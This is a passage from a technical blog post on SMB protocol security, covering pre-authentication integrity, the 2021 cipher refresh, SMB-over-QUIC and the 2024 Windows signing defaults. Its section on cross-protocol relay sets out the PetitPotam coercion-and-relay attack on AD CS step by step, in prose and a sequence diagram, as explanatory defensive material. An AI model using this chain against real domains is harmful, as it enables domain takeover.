&lt;td&gt;Dialect index + capability bitmap&lt;/td&gt;
&lt;td&gt;Every byte of all four pre-auth messages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;When&lt;/td&gt;
&lt;td&gt;Post-hoc, after session key derived&lt;/td&gt;
&lt;td&gt;At the moment of key derivation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Failure mode&lt;/td&gt;
&lt;td&gt;Detection: signed FSCTL mismatches&lt;/td&gt;
&lt;td&gt;Implicit: derived keys diverge&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Disable switch&lt;/td&gt;
&lt;td&gt;Skipped by pre-3.0 clients&lt;/td&gt;
&lt;td&gt;None; mandatory in 0x0311&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Extensibility&lt;/td&gt;
&lt;td&gt;Hard-coded fields in FSCTL&lt;/td&gt;
&lt;td&gt;Hashes whatever bytes flow&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Secure Negotiate had to know &lt;em&gt;what&lt;/em&gt; it was protecting. Pre-auth integrity does not. The hash chain absorbs whatever bytes the dialect happens to carry: new negotiate contexts in future dialects, new capability bits, new ciphers. The mechanism does not need to be updated to learn about them, because it does not parse them. It hashes them.&lt;/p&gt;
&lt;h3&gt;The per-context salts&lt;/h3&gt;
&lt;p&gt;There is one more subtlety. The &lt;code&gt;SMB2_PREAUTH_INTEGRITY_CAPABILITIES&lt;/code&gt; negotiate context, defined in [MS-SMB2] §2.2.3.1.1, contains a 32-byte &lt;code&gt;Salt&lt;/code&gt; field that the client and server populate with fresh PRNG output for each connection [@ms-smb2-pdf]. The salt is hashed in along with everything else, so two different connections from the same client to the same server end up with different &lt;code&gt;PreauthIntegrityHashValue&lt;/code&gt; values even if every other byte of NEGOTIATE is identical.&lt;/p&gt;
&lt;p&gt;The point is not to add entropy to the session key (which already gets entropy from the authentication exchange) but to defeat any attempt at pre-image or rainbow-table attacks on the hash chain itself. SHA-512 is the only hash function currently negotiated, and its 256-bit collision resistance is the protocol floor for pre-authentication integrity.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Microsoft Learn pages, the docs aggregators, and several widely-cited tertiary references describe SMB 3.1.1 pre-authentication integrity as &quot;signing the negotiate contexts with the session key.&quot; That description is wrong in a way that matters. There is no separate signed message validating the negotiation. The protection is constructed by feeding the hash of every pre-authentication message into the KDF that produces the session key. If you remember it as a signed negotiate, you will not understand why it is structurally stronger than Secure Negotiate. The mechanism is a &lt;em&gt;KDF binding&lt;/em&gt;, not a signature.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The empirical demonstration&lt;/h3&gt;
&lt;p&gt;The fastest way to feel the mechanism is to watch keys diverge in real time. The runnable code below produces two parallel SP 800-108-style derivations: an honest one where client and server hash the same four messages, and a tampered one where an in-path attacker flips a single byte in &lt;code&gt;NEGOTIATE Response&lt;/code&gt;. The two derivations produce identical keys in the honest case and visibly different keys in the tampered case.&lt;/p&gt;
&lt;p&gt;{`
const { createHmac, createHash } = require(&apos;crypto&apos;);&lt;/p&gt;
&lt;p&gt;function sha512(buf) {
  return createHash(&apos;sha512&apos;).update(buf).digest();
}&lt;/p&gt;
&lt;p&gt;function updateChain(H, message) {
  return sha512(Buffer.concat([H, Buffer.from(message)]));
}&lt;/p&gt;
&lt;p&gt;// SP 800-108 CTR-HMAC-SHA-256 in its simplest 32-byte-output form
function kdfSP108(secret, label, context, length) {
  const out = [];
  let i = 1;
  while (out.reduce((n, b) =&amp;gt; n + b.length, 0) &amp;lt; length) {
    const counter = Buffer.alloc(4);
    counter.writeUInt32BE(i++, 0);
    const block = createHmac(&apos;sha256&apos;, secret)
      .update(counter)
      .update(Buffer.from(label, &apos;utf8&apos;))
      .update(Buffer.from([0]))
      .update(context)
      .update(Buffer.from([0, 0, 1, 0]))
      .digest();
    out.push(block);
  }
  return Buffer.concat(out).subarray(0, length);
}&lt;/p&gt;
&lt;p&gt;const NEGOTIATE_REQ  = &apos;NEGOTIATE Request (client, signing required)&apos;;
const NEGOTIATE_RESP = &apos;NEGOTIATE Response (server, signing required)&apos;;
const SESSION_REQ    = &apos;SESSION_SETUP Request (NTLM challenge response)&apos;;
const SESSION_RESP   = &apos;SESSION_SETUP Response (success)&apos;;&lt;/p&gt;
&lt;p&gt;function derive(messages) {
  let H = Buffer.alloc(64, 0);
  for (const m of messages) H = updateChain(H, m);
  const authSecret = Buffer.from(&apos;AUTHENTICATION_PROTOCOL_SHARED_SECRET&apos;);
  return kdfSP108(authSecret, &apos;SMBSigningKey&apos;, H, 16).toString(&apos;hex&apos;);
}&lt;/p&gt;
&lt;p&gt;const honestClient = derive([NEGOTIATE_REQ, NEGOTIATE_RESP, SESSION_REQ, SESSION_RESP]);
const honestServer = derive([NEGOTIATE_REQ, NEGOTIATE_RESP, SESSION_REQ, SESSION_RESP]);
console.log(&apos;honest client:&apos;, honestClient);
console.log(&apos;honest server:&apos;, honestServer);
console.log(&apos;match:&apos;, honestClient === honestServer);&lt;/p&gt;
&lt;p&gt;// Attacker flips one byte in NEGOTIATE Response only on the client side
const tamperedClient = derive([NEGOTIATE_REQ, NEGOTIATE_RESP.replace(&apos;required&apos;, &apos;optional&apos;), SESSION_REQ, SESSION_RESP]);
const honestServer2  = derive([NEGOTIATE_REQ, NEGOTIATE_RESP, SESSION_REQ, SESSION_RESP]);
console.log(&apos;tampered client:&apos;, tamperedClient);
console.log(&apos;honest server:  &apos;, honestServer2);
console.log(&apos;match:&apos;, tamperedClient === honestServer2);
`}&lt;/p&gt;
&lt;p&gt;The honest pair of keys match. The tampered pair do not. The first signed READ that arrives at the server gets verified with a key that does not match the one the client used to sign it, and the server returns &lt;code&gt;STATUS_USER_SESSION_DELETED&lt;/code&gt;. The attacker has not been detected by a validation message; she has been routed around by a key-derivation function.&lt;/p&gt;

sequenceDiagram
    participant C as Client
    participant S as Server
    Note over C,S: H starts as 64 zero bytes on both sides
    C-&amp;gt;&amp;gt;S: NEGOTIATE Request
    Note over C,S: H = SHA-512(H, NEGOTIATE Request)
    S-&amp;gt;&amp;gt;C: NEGOTIATE Response
    Note over C,S: H = SHA-512(H, NEGOTIATE Response)
    C-&amp;gt;&amp;gt;S: SESSION_SETUP Request
    Note over C,S: H = SHA-512(H, SESSION_SETUP Request)
    S-&amp;gt;&amp;gt;C: SESSION_SETUP Response
    Note over C,S: H = SHA-512(H, SESSION_SETUP Response)
    Note over C,S: H enters SP 800-108 KDF as Context, derives SigningKey, CipherKey

flowchart LR
    A[Authentication secret] --&amp;gt; B[SP 800-108 CTR-HMAC-SHA-256 KDF]
    L[Label: SMBSigningKey or SMBC2SCipherKey or SMBS2CCipherKey or SMBAppKey] --&amp;gt; B
    H[Context: PreauthIntegrityHashValue] --&amp;gt; B
    B --&amp;gt; K1[SigningKey]
    B --&amp;gt; K2[Client-to-server CipherKey]
    B --&amp;gt; K3[Server-to-client CipherKey]
    B --&amp;gt; K4[AppKey]

A type-length-value carrier introduced in SMB 3.1.1&apos;s NEGOTIATE Request and Response so that future dialects can add new cryptographic capabilities without changing the parent message structure. Each context has a 2-byte type identifier, a length, and a body. The defined types include `SMB2_PREAUTH_INTEGRITY_CAPABILITIES` (the hash function and salt), `SMB2_ENCRYPTION_CAPABILITIES` (the encryption ciphers offered), and `SMB2_SIGNING_CAPABILITIES` (the signing algorithms offered, added in 2021 to support AES-GMAC). Because all negotiate contexts are part of the pre-authentication message stream, they are all hashed into `PreauthIntegrityHashValue` automatically [@ms-smb2-pdf].
&lt;p&gt;From this moment forward, every byte of NEGOTIATE and SESSION_SETUP is cryptographically bound to the eventual session key. There is no way an in-path attacker can downgrade a 3.1.1 connection without producing two divergent session keys and therefore no signed message after authentication can possibly verify on both sides. The mechanism does have one limit, and it is the one that the next decade of SMB hardening had to deal with: pre-authentication integrity ensures that &lt;em&gt;if&lt;/em&gt; signing or encryption is negotiated, an attacker cannot tamper with the negotiation. It does not require either to be negotiated.&lt;/p&gt;
&lt;h2&gt;5. The 2021 Cipher Refresh and SMB-over-QUIC&lt;/h2&gt;
&lt;p&gt;Six years after pre-authentication integrity shipped, two parallel additions arrived in the same Windows release window. Windows 11 21H2 and Server 2022, both from the second half of 2021, extended the SMB cipher matrix and introduced a new transport that ran SMB inside QUIC instead of TCP.&lt;/p&gt;
&lt;h3&gt;The 2021 cipher refresh&lt;/h3&gt;
&lt;p&gt;The Negotiate Context machinery designed in 2015 absorbed three new values for &lt;code&gt;EncryptionAlgorithmId&lt;/code&gt; without a dialect bump [@ms-smb2-versioning]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;0x0002&lt;/code&gt;: AES-128-GCM (already shipped with SMB 3.1.1 in 2015)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0x0003&lt;/code&gt;: AES-256-CCM (added 2021)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0x0004&lt;/code&gt;: AES-256-GCM (added 2021)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A fourth addition was the &lt;code&gt;SMB2_SIGNING_CAPABILITIES&lt;/code&gt; negotiate context, which let the dialect negotiate &lt;strong&gt;AES-GMAC&lt;/strong&gt; as a signing algorithm alongside AES-CMAC and HMAC-SHA-256 [@ms-smb2-versioning]. AES-GMAC is the authentication-only mode derived from AES-GCM, defined in NIST SP 800-38D [@nist-sp-800-38d].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;code&gt;EncryptionAlgorithmId&lt;/code&gt;&lt;/th&gt;
&lt;th&gt;Algorithm&lt;/th&gt;
&lt;th&gt;Key&lt;/th&gt;
&lt;th&gt;First SMB version&lt;/th&gt;
&lt;th&gt;CNSA 2.0 compatible&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;0x0001&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AES-128-CCM&lt;/td&gt;
&lt;td&gt;128 bits&lt;/td&gt;
&lt;td&gt;SMB 3.0 (2012)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Two-pass AEAD; pre-AES-NI baseline&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;0x0002&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AES-128-GCM&lt;/td&gt;
&lt;td&gt;128 bits&lt;/td&gt;
&lt;td&gt;SMB 3.1.1 (2015)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Single-pass AEAD; faster than CCM on AES-NI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;0x0003&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AES-256-CCM&lt;/td&gt;
&lt;td&gt;256 bits&lt;/td&gt;
&lt;td&gt;SMB 3.1.1 (2021 cipher refresh)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;CNSA-grade; rarely chosen over GCM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;0x0004&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AES-256-GCM&lt;/td&gt;
&lt;td&gt;256 bits&lt;/td&gt;
&lt;td&gt;SMB 3.1.1 (2021 cipher refresh)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;CNSA-grade and AES-NI / VAES accelerated&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The U.S. National Security Agency&apos;s Commercial National Security Algorithm Suite version 2.0, published in 2022 as the symmetric and asymmetric algorithm baseline for protecting U.S. classified information up to TOP SECRET. The symmetric component requires AES-256 in any AEAD mode for confidentiality and AES-256-GMAC or HMAC-SHA-384 for integrity. The SMB combination that satisfies CNSA 2.0 is AES-256-GCM for encryption and AES-GMAC for signing; AES-128 variants are not CNSA-eligible.
&lt;h3&gt;Why AES-GMAC won the speed argument&lt;/h3&gt;
&lt;p&gt;AES-CMAC runs AES in CBC mode over the message, with one AES block operation per 16 bytes of input. AES-GMAC reuses the GCM mode&apos;s Galois-field multiplier, GHASH, which can be implemented in parallel using a single AES key-schedule and the PCLMULQDQ carry-less multiplication instruction that Intel added with the Westmere generation in 2010 [@iacr-2018-392].PCLMULQDQ multiplies two 64-bit operands as polynomials over GF(2), bypassing the carry chain that makes integer multiplication slow. It is the workhorse of every modern AES-GCM implementation.&lt;/p&gt;
&lt;p&gt;Drucker, Gueron and Krasnov&apos;s 2018 ePrint &lt;em&gt;Making AES Great Again&lt;/em&gt; documents the performance ceiling on contemporary Intel hardware [@iacr-2018-392]. They measured &lt;strong&gt;0.64 cycles per byte for AES-GCM single-buffer&lt;/strong&gt; on Skylake-X with AES-NI and PCLMULQDQ, and projected the theoretical bound at &lt;strong&gt;0.16 cycles per byte&lt;/strong&gt; for the AVX-512 + VPCLMULQDQ multi-buffer variant on Ice Lake.&lt;/p&gt;
&lt;p&gt;The single-buffer ratio against AES-CMAC, which the same paper notes runs at roughly 2 to 3 cycles per byte on equivalent hardware, is about 3 to 5x. The multi-buffer ratio is larger, often 6x or more, because GMAC parallelises across independent 16-byte blocks where CMAC&apos;s CBC chain serialises them.&lt;/p&gt;
&lt;p&gt;Taken together, those numbers mean that on a modern file server saturating a 25 Gbit/s NIC, AES-GMAC signing costs roughly one-third the CPU of AES-CMAC for the same packet rate. That is not a marginal optimisation; it is the difference between needing two cores to sign and needing one.&lt;/p&gt;
&lt;h3&gt;SMB-over-QUIC&lt;/h3&gt;
&lt;p&gt;The second 2021 addition was a new transport. Microsoft demoed SMB-over-QUIC in early 2021 and shipped it for general availability in November 2021 with the Windows Server 2022 Datacenter: Azure Edition SKU [@smb-over-quic]. The transport runs SMB inside a QUIC connection (RFC 9000 [@rfc9000]) whose record layer is encrypted by TLS 1.3 (RFC 8446 [@rfc8446]) and bound to QUIC by RFC 9001 [@rfc9001]. The wire-layer port is UDP/443, the same port HTTPS-over-QUIC uses, which means SMB-over-QUIC traverses most firewalls that already pass web traffic.&lt;/p&gt;

A UDP-based multiplexed and secure transport protocol designed by Google in 2012 and standardised at IETF in 2021 as RFC 9000 [@rfc9000]. QUIC carries multiple independent streams of reliable bytes inside a single connection, uses TLS 1.3 for the cryptographic handshake (RFC 9001 [@rfc9001]), and identifies connections by a connection ID rather than the 5-tuple, which means a QUIC connection survives an IP address change. SMB-over-QUIC uses QUIC&apos;s reliable stream abstraction to carry the SMB packets that would otherwise go over TCP, and inherits QUIC&apos;s TLS 1.3 record-layer encryption.
&lt;h3&gt;The trust-anchor shift&lt;/h3&gt;
&lt;p&gt;SMB-over-TCP/445 trusts only the authentication protocol. If Kerberos or NTLM trusts the principal, the SMB session derives a key from that authentication and proceeds. There is no other trust input.&lt;/p&gt;
&lt;p&gt;SMB-over-QUIC adds &lt;strong&gt;server certificate PKI&lt;/strong&gt; to the trust model. The QUIC handshake authenticates the server with a TLS 1.3 X.509 certificate chain that must validate against the client&apos;s trust store. This is a real change in threat model: a compromised certificate authority in the client&apos;s root store can MITM SMB-over-QUIC the same way it can MITM HTTPS. For some organisations that is a feature, a trust anchor that lives in the certificate authority instead of in Kerberos. For others it is a regression.&lt;/p&gt;

Some descriptions of SMB-over-QUIC suggest the SMB application layer is unencrypted because QUIC already encrypts everything. That is wrong in a way that matters. SMB-over-QUIC still negotiates SMB 3.1.1 pre-authentication integrity and SMB signing; the SMB session key derives independently from the authentication protocol, not from the TLS 1.3 session secret. There are two layers of encryption (TLS 1.3 at the QUIC layer and AES-GCM at the SMB layer) precisely because the two layers have independent trust anchors. If the QUIC TLS 1.3 session is MITM&apos;d by a rogue CA, the SMB-layer signing keys still verify against the authentication protocol&apos;s session key; the inner layer is the structural backstop.
&lt;p&gt;The original SMB-over-QUIC release was restricted to Windows Server 2022 Datacenter: Azure Edition, a SKU available only as an Azure-hosted virtual machine [@smb-over-quic]. That restriction made SMB-over-QUIC effectively unusable for the on-premises file-server population that the protocol most needed. The restriction was lifted with Windows Server 2025, which broadens SMB-over-QUIC hosting to every edition of the server SKU [@ws-2025-whats-new][@smb-over-quic]. On the client side, Windows 11 24H2 became the first SMB-over-QUIC-capable mainstream desktop client [@smb-feature-descriptions].&lt;/p&gt;
&lt;p&gt;Samba 4.15.0 (September 2021) added the SMB3 signing-algorithm-negotiation parameters (&lt;code&gt;client smb3 signing algorithms&lt;/code&gt;, &lt;code&gt;server smb3 signing algorithms&lt;/code&gt;) and the SMB3 encryption-algorithm-negotiation parameters, and fixed AES-256-GCM/CCM server-side support that was previously broken under bug 14764 [@samba-4-15-0]. SMB-over-QUIC support for both &lt;code&gt;smbd&lt;/code&gt; and &lt;code&gt;smbclient&lt;/code&gt; did not arrive in Samba until 4.23.0, in September 2025, closing a four-year interop gap with the November 2021 Microsoft release [@samba-4-23-0].&lt;/p&gt;
&lt;p&gt;The 2021 refresh handed enterprises CNSA-grade ciphers and a no-VPN remote-file-access transport. But signing was still opt-in by default for general SMB shares, and the SMB-relay toolkit that Sir Dystic released in 2001 still worked against any 21H2 client that an administrator had not hardened by hand. The defaults had not caught up.&lt;/p&gt;
&lt;h2&gt;6. The 2024 Defaults: Locks Finally Turned On&lt;/h2&gt;
&lt;p&gt;On &lt;strong&gt;October 1, 2024&lt;/strong&gt;, Windows 11 24H2 shipped to retail [@win11-release-info]. A month later, on November 1, 2024, Windows Server 2025 followed [@ws-2025-whats-new]. The two releases changed seven defaults in one go, and exactly one of those changes mattered most.&lt;/p&gt;
&lt;p&gt;The headline change was structural: SMB signing required by default on both outbound and inbound connections for every share, not just SYSVOL and NETLOGON [@smb-security-hardening]. The Microsoft Learn SMB Security Hardening page states it directly:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Starting with Windows 11 24H2 and Windows Server 2025, all outbound and inbound SMB connections are now required to be signed by default. Previously, SMB signing was only required by default for connections to shares named SYSVOL and NETLOGON, and for clients of AD domain controllers. [@smb-security-hardening]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Ned Pyle, the Microsoft file server product manager who has shipped SMB releases for the better part of a decade, summarised the bundle in a Tech Community post that doubles as the canonical 2024 reference:&lt;/p&gt;

With the release of Windows Server 2025 and Windows 11 24H2, we have made the most changes to SMB security since the introduction of SMB 2 in Windows Vista. -- Ned Pyle, Microsoft [@pyle-techcom-4226591]
&lt;h3&gt;The bundle, in priority order&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Signing required by default&lt;/strong&gt;, the load-bearing change. The omission-downgrade attack that has worked since 2001 is structurally closed for any 24H2-or-later pair, because the server will refuse an unsigned session [@smb-security-hardening][@pyle-techcom-4226591].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Client-side encryption mandate&lt;/strong&gt;, available but &lt;strong&gt;not on by default&lt;/strong&gt;. &lt;code&gt;Set-SmbClientConfiguration -RequireEncryption $true&lt;/code&gt; now refuses any outbound SMB session that does not negotiate AES-GCM encryption [@smb-security-hardening]. The most-misreported fact about the 2024 rollout is whether this is on. It is not.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Authentication rate limiter.&lt;/strong&gt; A 2-second delay between failed NTLM or local-KDC Kerberos authentication attempts, configurable but on by default. Microsoft&apos;s published arithmetic: an attack that sends 300 guesses per second for 5 minutes (90,000 attempts) now takes 50 hours [@smb-security-hardening].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;NTLM blocking for outbound SMB.&lt;/strong&gt; &lt;code&gt;Set-SmbClientConfiguration -BlockNTLM $true&lt;/code&gt; refuses outbound NTLM fallback, forcing Kerberos or failing the session [@smb-security-hardening].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SMB dialect minimum and maximum&lt;/strong&gt;, configurable per-host on both client and server [@smb-security-hardening].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SMB alternative ports&lt;/strong&gt;, so that an administrator can run SMB-over-QUIC on a non-default UDP port without losing audit support [@smb-security-hardening].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Insecure guest authentication blocked by default&lt;/strong&gt;, on every edition of Windows 11, closing a gap that previously only Enterprise and Education had been opted into since Windows 10 1709 [@smb-interception-defense].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The eighth change, also part of the 2024-2025 cycle but described in the Server 2025 release notes rather than the hardening page, was the &lt;strong&gt;broadening of SMB-over-QUIC hosting&lt;/strong&gt; from the Azure Edition SKU to every edition of Windows Server 2025 [@ws-2025-whats-new][@smb-over-quic]. That broadening is the transport-side enabler for the rest of the bundle, because it makes SMB-over-QUIC available to organisations that do not run their file servers in Azure.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The 2024-2025 rollout made SMB &lt;strong&gt;signing&lt;/strong&gt; required by default. It did not make SMB &lt;strong&gt;encryption&lt;/strong&gt; required by default. A 24H2 client speaking to a Server 2025 file share without an administrator&apos;s opt-in will still send the file&apos;s contents over the wire in cleartext, with only the per-packet AES-CMAC signatures preventing tampering. A passive eavesdropper on the path can still read the file. The fix is one line of PowerShell (&lt;code&gt;Set-SmbClientConfiguration -RequireEncryption $true&lt;/code&gt;) or a per-share &lt;code&gt;Set-SmbShare -EncryptData $true&lt;/code&gt;. Several widely-circulated 2024 press summaries got this backwards; the Microsoft Learn page is the source of truth [@smb-security-hardening].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The arc, closed&lt;/h3&gt;
&lt;p&gt;The 2001 SMBRelay disclosure to the 2024 default-on flip is twenty-three years and seven months [@smbrelay-cdc][@smb-security-hardening]. That is the arithmetic of the SMB story. The mechanism that closed the omission-downgrade attack family for the typical Windows file share existed in production from July 2015 onwards; the defaults that made the mechanism universal arrived nine years later.&lt;/p&gt;
&lt;p&gt;The 2024 default does not retroactively secure the long tail of legacy hosts: the SMB-relay primitive that Sir Dystic shipped in 2001 still works against any pre-24H2 Windows client that an administrator has not turned signing on for by hand, and against any third-party SMB server that does not yet support signing. Default-on protects the leading edge; the legacy fleet upgrades on its own calendar.&lt;/p&gt;
&lt;h3&gt;The compatibility breakage&lt;/h3&gt;
&lt;p&gt;The default-on signing flip broke a long tail of consumer NAS devices that ship SMB server implementations without signing support. Synology and QNAP and NETGEAR home NAS units running older firmware refused 24H2 client connections starting October 2024, and the recovery path required either a firmware update from the vendor or a per-host policy exception. The DSInternals matrix tracks the exact set of clients and servers that pass the new defaults [@dsinternals-24h2].&lt;/p&gt;

The audit channel for tracking which peers an organisation&apos;s clients fail to sign with is `Applications and Services Logs\Microsoft\Windows\SmbClient\Audit`, populated by the SMB client itself whenever it refuses an unsigned session [@smb-security-hardening]. The transitional pattern administrators were forced to adopt in late 2024 was: (a) leave signing required globally, (b) maintain a per-host exception list for unupgradable NAS devices, (c) put the exception list under change control with a target removal date. A few months of audit-log data is usually enough to enumerate the long tail of peers an organisation actually depends on; the policy-exception approach is structurally sound because the exception is narrow and time-bounded.
&lt;h3&gt;What still works: the cross-protocol relay class&lt;/h3&gt;
&lt;p&gt;Default-on signing closed the &lt;em&gt;single-protocol&lt;/em&gt; SMB relay. It did nothing about the &lt;em&gt;cross-protocol&lt;/em&gt; relay class, which routes around SMB entirely. The exemplar attack is &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;PetitPotam&lt;/a&gt;, disclosed by Lionel &quot;Topotam&quot; Gilles in July 2021 [@petitpotam-gh][@nvd-cve-2021-36942], with a sibling variant CVE-2022-26925 on the LSARPC interface [@nvd-cve-2022-26925].&lt;/p&gt;
&lt;p&gt;PetitPotam abuses the Encrypting File System Remote Protocol (MS-EFSRPC). The &lt;code&gt;EfsRpcOpenFileRaw&lt;/code&gt; method, exposed via the LSARPC named pipe over SMB, accepts a UNC path that the server resolves by &lt;strong&gt;opening an outbound SMB connection&lt;/strong&gt; to whatever host the path points at, using the calling user&apos;s credentials [@petitpotam-gh].&lt;/p&gt;
&lt;p&gt;An attacker who can call &lt;code&gt;EfsRpcOpenFileRaw&lt;/code&gt; on a server with a UNC path pointing back at the attacker&apos;s host obtains an outbound NTLM authentication from the server, typically a domain controller, since DCs run the EFSRPC service. The attacker then relays that NTLM authentication, not to another SMB server, but to &lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/certified-pre-owned-ad-cs-and-active-directorys-second-trust/&quot; rel=&quot;noopener&quot;&gt;Active Directory Certificate Services&lt;/a&gt; Web Enrollment&lt;/strong&gt; at &lt;code&gt;/certsrv/&lt;/code&gt;, which speaks HTTP and historically did not require client-side signing of the authentication.&lt;/p&gt;
&lt;p&gt;Once the relay completes, the attacker has a certificate issued in the name of the coerced principal, which on a domain controller is a domain controller account. From there, the attacker forges Kerberos tickets and the domain is compromised.&lt;/p&gt;
&lt;p&gt;A 2019 result by Marina Simakov and Yaron Zinar at Preempt (now CrowdStrike), CVE-2019-1040, sharpens the cross-protocol concern further [@drop-the-mic][@nvd-cve-2019-1040]. The pair found that an in-path attacker could bypass the NTLM Message Integrity Code by manipulating SPNEGO fields, then strip the &quot;signing required&quot; bit from the relayed NTLM message itself.&lt;/p&gt;
&lt;p&gt;That meant a relay attack could survive against targets that required NTLM signing, because the signing-required negotiation could be tampered with on the NTLM authentication exchange. Microsoft patched CVE-2019-1040 in 2019, but the result underscored the same lesson at the NTLM layer that SMB had learned at the SMB layer: any signing negotiation that is not bound to the eventual key derivation can be stripped.&lt;/p&gt;

A coercion-and-relay attack family disclosed by Lionel Gilles in July 2021 [@petitpotam-gh] in which the attacker invokes MS-EFSRPC `EfsRpcOpenFileRaw` on a target server with a UNC path that the server resolves by opening an outbound SMB connection, leaking the server&apos;s NTLM credentials to the attacker. The leaked credentials are then relayed cross-protocol to AD CS Web Enrollment over HTTPS. The class subsumes CVE-2021-36942 (LSA over the LSARPC pipe) and CVE-2022-26925 (a sibling LSARPC variant). The defence is **not** SMB signing on the target; it is Extended Protection for Authentication on the relay-to endpoint [@kb5005413].

A defence against NTLM relay attacks that binds the underlying transport&apos;s channel (typically a TLS server certificate hash) into the GSS channel-binding token that the SPNEGO authentication exchange carries [@kb5005413]. An attacker who relays an NTLM authentication from a victim&apos;s connection to an attacker-controlled TLS connection finds that the channel bindings disagree, and the relay-to endpoint refuses the authentication. EPA on AD CS `/certsrv/` is the canonical fix for PetitPotam-class attacks [@kb5005413].
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; SMB at the wire layer is now cryptographically sufficient. Modern SMB-related attacks no longer try to break SMB. They coerce SMB into authenticating and then relay the authentication to a protocol that does not require signing. The defence is no longer a single-protocol problem. Extended Protection for Authentication on AD CS, and eventually NTLM removal, are the structural fixes -- nothing at the SMB layer can close the cross-protocol relay class.&lt;/p&gt;
&lt;/blockquote&gt;

sequenceDiagram
    participant A as Attacker
    participant V as Victim DC
    participant ADCS as ADCS Web Enrollment over HTTPS
    A-&amp;gt;&amp;gt;V: LSARPC EfsRpcOpenFileRaw, UNC path to attacker share
    V-&amp;gt;&amp;gt;A: Outbound SMB NEGOTIATE with NTLM credentials of DC machine account
    Note over A,V: SMB signing on V does not help, V is the client
    A-&amp;gt;&amp;gt;ADCS: Relayed NTLM authentication to /certsrv/certfnsh.asp
    ADCS-&amp;gt;&amp;gt;A: Issues certificate for DC machine account
    Note over A,ADCS: Without EPA on /certsrv/ the relay succeeds
&lt;p&gt;The 2024 hardening package is real progress. It is also explicitly bounded. The headline change closes one attack class structurally and leaves the cross-protocol class untouched. To see what is still open, we have to leave SMB for a moment and look at the cryptographic limits the protocol still inherits.&lt;/p&gt;
&lt;h3&gt;A short PowerShell-equivalent for the audit&lt;/h3&gt;
&lt;p&gt;To verify the new defaults on a freshly imaged 24H2 client, run &lt;code&gt;Get-SmbClientConfiguration | Select RequireSecuritySignature&lt;/code&gt; and the server analogue. The runnable snippet below shows the &lt;em&gt;logic&lt;/em&gt; of those commands in JavaScript: readable, not directly executable on Windows.&lt;/p&gt;
&lt;p&gt;{`
const smbClientPolicyOn24H2 = {
  RequireSecuritySignature: true,
  EnableSecuritySignature: true,
  BlockNTLM: false,
  RequireEncryption: false,
  AuditServerDoesNotSupportEncryption: true,
  AuditServerDoesNotSupportSigning: true,
};&lt;/p&gt;
&lt;p&gt;function reportPosture(cfg) {
  if (cfg.RequireSecuritySignature) {
    console.log(&apos;Signing: required (24H2 default).&apos;);
  } else {
    console.log(&apos;Signing: NOT required. Run Set-SmbClientConfiguration -RequireSecuritySignature true.&apos;);
  }
  if (cfg.RequireEncryption) {
    console.log(&apos;Encryption: required.&apos;);
  } else {
    console.log(&apos;Encryption: opt-in only. Consider Set-SmbClientConfiguration -RequireEncryption true.&apos;);
  }
  if (cfg.BlockNTLM) {
    console.log(&apos;NTLM outbound: blocked.&apos;);
  } else {
    console.log(&apos;NTLM outbound: allowed. Consider -BlockNTLM true on hardened hosts.&apos;);
  }
}&lt;/p&gt;
&lt;p&gt;reportPosture(smbClientPolicyOn24H2);
`}&lt;/p&gt;
&lt;h2&gt;7. What SMB 3.1.1 Cannot Do&lt;/h2&gt;
&lt;p&gt;Five things SMB 3.1.1 cannot do, even with every default flipped on and every primitive at full strength.&lt;/p&gt;
